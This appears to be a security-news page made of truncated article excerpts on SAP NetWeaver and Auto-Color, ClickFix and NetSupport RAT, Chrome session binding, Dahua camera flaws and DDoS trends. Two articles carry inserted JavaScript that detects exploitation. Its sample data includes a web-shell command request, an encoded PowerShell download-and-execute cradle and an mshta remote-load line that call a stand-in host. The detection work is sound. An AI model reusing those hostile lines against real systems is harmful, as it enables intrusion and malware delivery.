The Breach News

Hackers Target SAP Vulnerability to Breach Linux Systems and Deploy Auto-Color Malware

July 30, 2025
Vulnerability / Threat Intelligence

Threat actors have been found exploiting a critical SAP NetWeaver vulnerability, now patched, to introduce the Auto-Color backdoor in an April 2025 attack on a U.S.-based chemicals firm. According to a report from Darktrace shared with The Hacker News, the attacker accessed the company’s network over three days, attempted to download suspicious files, and communicated with infrastructure associated with the Auto-Color malware. The vulnerability, identified as CVE-2025-31324, is a severe unauthenticated file upload flaw in SAP NetWeaver that allows remote code execution (RCE) and was fixed by SAP in April. Auto-Color, first reported by Palo Alto Networks Unit 42 in February, operates similarly to a remote access trojan, providing remote access to compromised Linux systems. It has been linked to attacks against universities and government entities in North America and Asia between November and December 2024.
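
The flaw described above is an unauthenticated upload, so the first thing a responder wants is a way to spot it in web server logs. The following is an added example and not code from Darktrace, SAP or The Hacker News: it triages an access log for requests to the Visual Composer Metadata Uploader endpoint (the publicly documented path for CVE-2025-31324) and for follow-up requests to .jsp files under /irj/, where uploaded web shells are served from. The log lines are constructed for the example and are not from the incident.

```javascript
// Added example: triage an HTTP access log for exploitation of CVE-2025-31324
// (unauthenticated upload to the SAP NetWeaver Visual Composer Metadata
// Uploader). The endpoint path and the /irj/ web-shell location are the
// publicly documented ones for this CVE; the log lines below are constructed
// for the example and are not from the incident described in the article.
const UPLOADER = '/developmentserver/metadatauploader';
// Combined-log-format fields we need: client IP, timestamp, method, path, status.
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+/;

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], ts: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

function triage(lines) {
  const uploads = [];   // requests to the vulnerable uploader
  const jspHits = [];   // requests to .jsp files under /irj/, where uploaded shells land
  for (const line of lines) {
    const r = parseLine(line);
    if (!r) continue;
    const path = r.path.toLowerCase();
    if (path.startsWith(UPLOADER)) {
      // A POST answered with 200 means the server accepted content; a GET is usually a probe.
      const severity = r.method === 'POST' && r.status === 200 ? 'high' : 'medium';
      uploads.push({ ...r, severity });
    }
    if (r.method === 'GET' && /^\/irj\/[^?]*\.jsp(\?|$)/.test(path)) {
      jspHits.push(r);
    }
  }
  // Strongest signal: the same client hit the uploader and then a JSP in the portal root.
  const uploaderIps = new Set(uploads.map(u => u.ip));
  const correlated = jspHits.filter(h => uploaderIps.has(h.ip));
  return { uploads, jspHits, correlated };
}

// Constructed sample log (not real traffic).
const SAMPLE_LOG = [
  '198.51.100.23 - - [25/Apr/2025:03:12:41 +0000] "POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1" 200 512 "-" "python-requests/2.31.0"',
  '198.51.100.23 - - [25/Apr/2025:03:12:45 +0000] "GET /irj/helper.jsp?cmd=id HTTP/1.1" 200 87 "-" "python-requests/2.31.0"',
  '10.20.30.40 - - [25/Apr/2025:08:00:01 +0000] "GET /irj/portal HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [25/Apr/2025:09:41:10 +0000] "GET /developmentserver/metadatauploader HTTP/1.1" 200 1344 "-" "curl/8.4.0"',
  '10.20.30.40 - - [25/Apr/2025:09:55:30 +0000] "POST /irj/servlet/prt/portal/prtroot/com.sap.portal.navigation.portallauncher.default HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
];

const RESULT = triage(SAMPLE_LOG);
for (const h of RESULT.correlated) {
  console.log(`web shell use from ${h.ip} at ${h.ts}: ${h.method} ${h.path}`);
}
```

A hit in `correlated` should be followed by a sweep of the portal's servlet_jsp root directories for recently written .jsp files, and the patch itself is the SAP security note that SAP released for this CVE in April; log triage alone does not prove a shell was not planted by an earlier, unlogged request.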


Cybercriminals Leverage ClickFix Technique to Distribute NetSupport RAT in Recent Attacks

February 11, 2025
Malware / Cyber Attack

In a disturbing trend since early January 2025, cybercriminals have been utilizing the ClickFix method to distribute a remote access trojan known as NetSupport RAT. This malware, often spread through deceptive websites and fraudulent browser updates, provides attackers with full control of the victim’s device. This access allows them to monitor the screen in real time, manipulate the keyboard and mouse, upload and download files, and execute harmful commands.

Originally developed as a legitimate tool for IT support under the name NetSupport Manager, the software has been weaponized by malicious actors to target organizations and harvest sensitive information, including screenshots, audio, video, and files. According to eSentire, “ClickFix involves injecting a fake CAPTCHA webpage onto compromised sites, tricking users into executing malicious PowerShell commands that download and activate malware payloads.”
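
The ClickFix chain described above leaves a distinctive trace in endpoint telemetry: the victim pastes the copied command into the Run dialog, so the interpreter is spawned by explorer.exe and usually carries a hidden-window flag, an encoded command and a download-and-execute cradle. The following is an added example, not eSentire's or NetSupport's code, that scores process-creation events for that pattern; the event records are constructed for the example and shaped like the ParentImage, Image and CommandLine fields of a Sysmon event 1.

```javascript
// Added example: scoring process-creation events for the ClickFix pattern.
// Event records are constructed (not real telemetry) and shaped like the
// ParentImage/Image/CommandLine fields of a Sysmon event 1.
const INTERPRETERS = new Set(['powershell.exe', 'pwsh.exe', 'mshta.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe']);
const CRADLE = /\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile|iex|invoke-expression|certutil|bitsadmin)\b/i;
const STEALTH = /(-w(indowstyle)?\s+h(idden)?\b|-nop\b|-noprofile\b|-nonint\w*\b|-e(xecutionpolicy|p)\s+bypass)/i;
const ENCODED = /-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})/i;
const REMOTE_URL = /https?:\/\/\S+/i;

function baseName(p) { return String(p).split(/[\\/]/).pop().toLowerCase(); }

// PowerShell -EncodedCommand takes base64 of UTF-16LE text; decode it so a
// cradle hidden inside the blob can be matched as well.
function decodeEncoded(cmdline) {
  const m = ENCODED.exec(cmdline);
  if (!m) return null;
  return Buffer.from(m[2], 'base64').toString('utf16le');
}

function scoreEvent(ev) {
  const child = baseName(ev.Image);
  const reasons = [];
  if (!INTERPRETERS.has(child)) return { score: 0, reasons, decoded: null };
  const decoded = decodeEncoded(ev.CommandLine);
  const text = decoded ? `${ev.CommandLine} ${decoded}` : ev.CommandLine;
  if (baseName(ev.ParentImage) === 'explorer.exe') reasons.push('spawned by explorer.exe (Run dialog or shell)');
  if (STEALTH.test(text)) reasons.push('hidden window or execution-policy bypass');
  if (decoded !== null) reasons.push('encoded command');
  if (CRADLE.test(text)) reasons.push('download-and-execute cradle');
  if (REMOTE_URL.test(text)) reasons.push('remote URL on the command line');
  if (child === 'mshta.exe' && REMOTE_URL.test(text)) reasons.push('mshta loading a remote HTA');
  return { score: reasons.length, reasons, decoded };
}

// Events that accumulate at least `threshold` reasons are reported.
function findClickFix(events, threshold = 3) {
  return events.map(ev => ({ ...ev, ...scoreEvent(ev) })).filter(r => r.score >= threshold);
}

// Constructed sample events. The encoded payload is built here so the example is self-contained.
const ENCODED_PAYLOAD = Buffer.from("iex (iwr 'http://203.0.113.5/captcha.txt' -UseBasicParsing)", 'utf16le').toString('base64');
const SAMPLE_EVENTS = [
  { ParentImage: 'C:\\Windows\\explorer.exe', Image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    CommandLine: `powershell -w hidden -ep bypass -enc ${ENCODED_PAYLOAD}` },
  { ParentImage: 'C:\\Windows\\explorer.exe', Image: 'C:\\Windows\\System32\\mshta.exe',
    CommandLine: 'mshta http://203.0.113.5/verify.hta' },
  { ParentImage: 'C:\\Windows\\CCM\\CcmExec.exe', Image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    CommandLine: 'powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1' },
  { ParentImage: 'C:\\Windows\\explorer.exe', Image: 'C:\\Windows\\System32\\cmd.exe',
    CommandLine: 'cmd.exe /c ipconfig /all' },
];

for (const hit of findClickFix(SAMPLE_EVENTS)) {
  console.log(`score ${hit.score}: ${hit.CommandLine.slice(0, 60)} -> ${hit.reasons.join('; ')}`);
}
```

The threshold keeps a management-tool PowerShell launch (scored 1 above) out of the alert while the two pasted commands score 3 and 5. On the host, the pasted text itself can be corroborated from the Run dialog history the shell keeps in the user's RunMRU registry key.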


ToolShell Exploit Confuses the Lines Between Crime and Espionage

August 1, 2025
Black Hat / Cyberwarfare / Nation-State Attacks / Events
Also: Rethinking IT-OT Integration; Previewing Black Hat 2025
By Anna Delaney (annamadeline)
Image caption: Clockwise, from top left: Anna Delaney, Mathew Schwartz, Suparna Goswami, and Tom Field

This week, four editors from ISMG convened to delve into the latest developments surrounding the…


Exclusive: Major Privacy Breach Reveals 1.1 Million Private Messages from Tea App

A digital platform intended to provide anonymity and safeguard personal experiences has instead compromised the privacy of its users. The app, Tea, designed as a secure space for women to discuss their experiences in potentially harmful relationships, has experienced two significant data breaches within a short span, resulting in the…


Google Unveils Open Beta for Device Bound Session Credentials in Chrome, Enhancing Patch Transparency with Project Zero

July 30, 2025
Device Security / AI Security

Google has launched an open beta for its Device Bound Session Credentials (DBSC), a security feature aimed at protecting users from session cookie theft attacks. Initially introduced as a prototype in April 2024, DBSC binds authentication sessions to specific devices, preventing malicious actors from using stolen cookies to access accounts from unauthorized devices. “Available in the Chrome browser on Windows, DBSC enhances security after login by linking session cookies—small files that remember user information—to the device used for authentication,” said Andy Wen, senior director of product management at Google Workspace. This initiative not only secures user accounts post-authentication but also complicates the reuse of session cookies, bolstering session integrity. The company has also…


AI Continues to Produce Vulnerable Code

August 1, 2025
Artificial Intelligence & Machine Learning / Next-Generation Technologies & Secure Development
Veracode Study Finds Nearly Half of AI-Generated Code is Insecure
By Rashmi Ramesh (@rashmiramesh_)
Image: Shutterstock/ISMG

Recent findings from Veracode have raised serious concerns regarding artificial intelligence's role in software development. Researchers discovered that large language models…


Serious Security Vulnerabilities in Dahua Cameras Enable Remote Takeover via ONVIF and File Upload Exploits

July 30, 2025
Firmware Security / Vulnerability

Cybersecurity researchers have revealed critical security vulnerabilities within the firmware of Dahua smart cameras, which have since been patched. If left unaddressed, these flaws could allow attackers to take control of affected devices. According to a report from Bitdefender shared with The Hacker News, the vulnerabilities—related to the device’s ONVIF protocol and file upload handlers—enable unauthorized attackers to execute arbitrary commands remotely, effectively seizing control of the device.

Tracked as CVE-2025-31700 and CVE-2025-31701 (CVSS scores: 8.1), the vulnerabilities impact the following device series running firmware versions with build timestamps prior to April 16, 2025:

  • IPC-1XXX Series
  • IPC-2XXX Series
  • IPC-WX Series
  • IPC-ECXX Series
  • SD3A Series
  • SD2A Series
  • SD3D Series
  • SDT2A Series
  • SD2C Series

Users can check their device’s build time by logging into the web interface and navigating to Settings → System Information → Version. Both vulnerabilities are classified as…


Gcore DDoS Radar Report Highlights 56% Yearly Surge in DDoS Attacks

February 11, 2025
IoT Security / Cloud Security

The latest Gcore DDoS Radar report, which examines attack data from Q3 to Q4 2024, shows a staggering 56% year-over-year increase in DDoS attacks, with the largest recorded attack reaching 2 Tbps. The financial services sector experienced the most significant rise, with attacks jumping by 117%, while the gaming industry continued to be the primary target. These findings underscore the urgent need for robust and adaptive DDoS mitigation strategies as attacks grow both in frequency and precision.

Key Insights on the Future of DDoS Defense

Here are four crucial takeaways from the Gcore Radar report:

  1. Volume and Sophistication of DDoS Attacks on the Rise: A 17% increase in total attacks over the previous half-year (on top of the 56% year-over-year rise), coupled with a new peak volume of 2 Tbps, highlights the pressing necessity for advanced protective measures.

  2. Growing Risks for Financial Services: The 117% spike in attacks within this sector signals an urgent need for enhanced security protocols.

  3. Shift Towards Shorter, High-Intensity Attacks: The prevalence of rapid burst attacks necessitates a reevaluation of traditional mitigation strategies, which may no longer be sufficient.

Let’s explore the data in detail.
